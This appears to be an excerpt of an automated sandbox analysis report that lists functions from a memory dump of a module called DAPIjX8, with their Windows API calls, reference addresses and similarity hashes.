                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: LocalOpenService$Config2CreateEventFreeManagerObjectQuerySingleSizeWait
                                  • String ID:
                                  • API String ID: 2777808081-0
                                  • Opcode ID: 09534b310644c52a6f99a9298f9256a5dfa951a975e56fb8d350abf1917a1f35
                                  • Instruction ID: f3c52d2cfe0528a9b8ea176afbedf66a23ab1ee80d57f860f51eea13cdfc8a0d
                                  • Opcode Fuzzy Hash: 09534b310644c52a6f99a9298f9256a5dfa951a975e56fb8d350abf1917a1f35
                                  • Instruction Fuzzy Hash: D2117C35D452389BEB20DF50EC55BDEB775EF54710F40019AE54AA6192DBB51F80CF80
                                  APIs
                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 100203E1
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001F310,?,00000000,00000000), ref: 100203FB
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10020408
                                  • CloseHandle.KERNEL32(?), ref: 10020411
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 3360349984-0
                                  • Opcode ID: 4a9e6af0ab6b8cbca915cad7cca1c213d56958b0c389dc99dd025bdf113dac05
                                  • Instruction ID: f54606e51e1a0b4728f0c2717eb72f4fe9e4390f74c29335ff2ac4329cce8945
                                  • Opcode Fuzzy Hash: 4a9e6af0ab6b8cbca915cad7cca1c213d56958b0c389dc99dd025bdf113dac05
                                  • Instruction Fuzzy Hash: C3F03631A44228BBEB10DFE48C46FDE7FB5EB09711F114155FB24AB2D1D6B15A548BC0
                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,1005ED7C,00000000,00000001,00000000,00000000,?,100582AF,00000000,?,00000000), ref: 1005F83F
                                  • GetLastError.KERNEL32(?,1005ED7C,00000000,00000001,00000000,00000000,?,100582AF,00000000,?,00000000,00000000,00000000,?,10058803,?), ref: 1005F84B
                                    • Part of subcall function 1005F811: CloseHandle.KERNEL32(100819C0,1005F85B,?,1005ED7C,00000000,00000001,00000000,00000000,?,100582AF,00000000,?,00000000,00000000,00000000), ref: 1005F821
                                  • ___initconout.LIBCMT ref: 1005F85B
                                    • Part of subcall function 1005F7D3: CreateFileW.KERNEL32(100711B8,40000000,00000003,00000000,00000003,00000000,00000000,1005F802,1005ED69,00000000,?,100582AF,00000000,?,00000000,00000000), ref: 1005F7E6
                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,1005ED7C,00000000,00000001,00000000,00000000,?,100582AF,00000000,?,00000000,00000000), ref: 1005F870
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: 0c8ee9046875c7748245a9d26db4b56da79f02cbe4d3ca59d0ecfca8ab75afe9
                                  • Instruction ID: ac67bddf8f52101fd1c52d39a29875ee89b29ce1ae15bc79d8ab631011ba7560
                                  • Opcode Fuzzy Hash: 0c8ee9046875c7748245a9d26db4b56da79f02cbe4d3ca59d0ecfca8ab75afe9
                                  • Instruction Fuzzy Hash: 14F01C3A441239BBDF125F95CC44AEA3FA7FF487E0F164014FA4886120CA3299609BD0
                                  APIs
                                  • setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 10022064
                                  • CancelIo.KERNEL32(?,?,100219DF,?,00000000,100216B4,?,?,10081068,?,?,?,00000000,10062583,000000FF), ref: 10022070
                                  • closesocket.WS2_32(?), ref: 10022086
                                  • SetEvent.KERNEL32(?,?,100219DF,?,00000000,100216B4,?,?,10081068,?,?,?,00000000,10062583,000000FF), ref: 10022092
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: CancelEventclosesocketsetsockopt
                                  • String ID:
                                  • API String ID: 852421847-0
                                  • Opcode ID: 18a416a65e308fca91516f1ab9571e52320d33af3778e9c1de1ab6d92bd37963
                                  • Instruction ID: df6f8a5613b988293f7468834407b88d54820ddb872680da4a738be61adc74fd
                                  • Opcode Fuzzy Hash: 18a416a65e308fca91516f1ab9571e52320d33af3778e9c1de1ab6d92bd37963
                                  • Instruction Fuzzy Hash: C5F05E31000715EFEB619B60CC49B967BABEF05310F514269F56A861B0DFB12848DB81
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: __dosmaperr_free
                                  • String ID: SystemRoot
                                  • API String ID: 3116789124-2034820756
                                  • Opcode ID: 19a73d21b6288dd25c62479f6e9760816a64cec6a398666d2b92e28e3320fcd8
                                  • Instruction ID: 5b65ae1d6657afc16d850ee463122eae5b311d16dff0027f7b3b2ff69e91d112
                                  • Opcode Fuzzy Hash: 19a73d21b6288dd25c62479f6e9760816a64cec6a398666d2b92e28e3320fcd8
                                  • Instruction Fuzzy Hash: C421E7756042969FE708CE68C880BA9B7E8EF46798F2581ADFC85DB341FA31ED05C750
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000001), ref: 10021465
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001), ref: 1002149B
                                    • Part of subcall function 100219C0: WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,100216B4,?,?,10081068,?,?,?,00000000,10062583,000000FF,?,10018B6B), ref: 100219F2
                                    • Part of subcall function 100219C0: RtlDeleteCriticalSection.NTDLL(?), ref: 10021A0F
                                    • Part of subcall function 100219C0: WSACleanup.WS2_32 ref: 10021A15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ObjectSingleWait$CleanupCreateCriticalDeleteEventSection
                                  • String ID: p
                                  • API String ID: 1919503478-2181537457
                                  • Opcode ID: 4b4d3e3c57621e71c8ced458160e02519720282f55b1d69f68e537f8979aadae
                                  • Instruction ID: 3877883f66ecdafbe8ef0c958e7d9b0a3b4718399632d218a487b46c59c5b629
                                  • Opcode Fuzzy Hash: 4b4d3e3c57621e71c8ced458160e02519720282f55b1d69f68e537f8979aadae
                                  • Instruction Fuzzy Hash: 5B017135D882289EDB20DF50EC51BDEB771FB44710F5002DBE55AA6282DFB51A84CF40